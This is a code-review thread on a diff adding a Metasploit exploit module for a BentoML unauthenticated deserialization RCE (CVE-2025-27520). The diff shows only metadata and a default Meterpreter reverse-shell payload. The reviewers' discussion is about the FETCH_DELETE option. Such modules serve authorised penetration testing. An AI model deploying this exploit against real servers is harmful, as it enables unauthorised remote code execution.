modules/exploits/linux/http/bentoml_rce_cve_2025_27520.rb

```diff
@@ -0,0 +1,109 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'BentoML RCE',
+        'Description' => %q{
+          A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in v1.4.2 of BentoML.
+          It allows any unauthenticated user to execute arbitrary code on the server.
+        },
+        'Author' => [
+          'c2an1',            # Vulnerability discovery and PoC
+          'Takahiro Yokoyama' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-27520'],
+          ['URL', 'https://github.com/advisories/GHSA-33xw-247w-6hmc'],
+        ],
+        'Platform' => %w[linux],
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                # defaults to cmd/linux/http/aarch64/meterpreter/reverse_tcp
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
+              }
+            }
+          ],
+        ],
+        'DefaultOptions' => {
+          'FETCH_DELETE' => true
+        },
```

Comment:
If I remember correctly, I think I `FETCH_DELETE` is enum now, so in order to use it, you should set it to `bash`
```suggestion
        'DefaultOptions' => {
          'FETCH_DELETE' => 'bash'
        },
```

Reply:
I believe FETCH_DELETE is a boolean (true or false). https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/adapter/fetch.rb#L6 Perhaps you meant `FETCH_FILELESS`? https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/adapter/fetch/linux_options.rb#L7

Reply:
Yep, you're right, sorry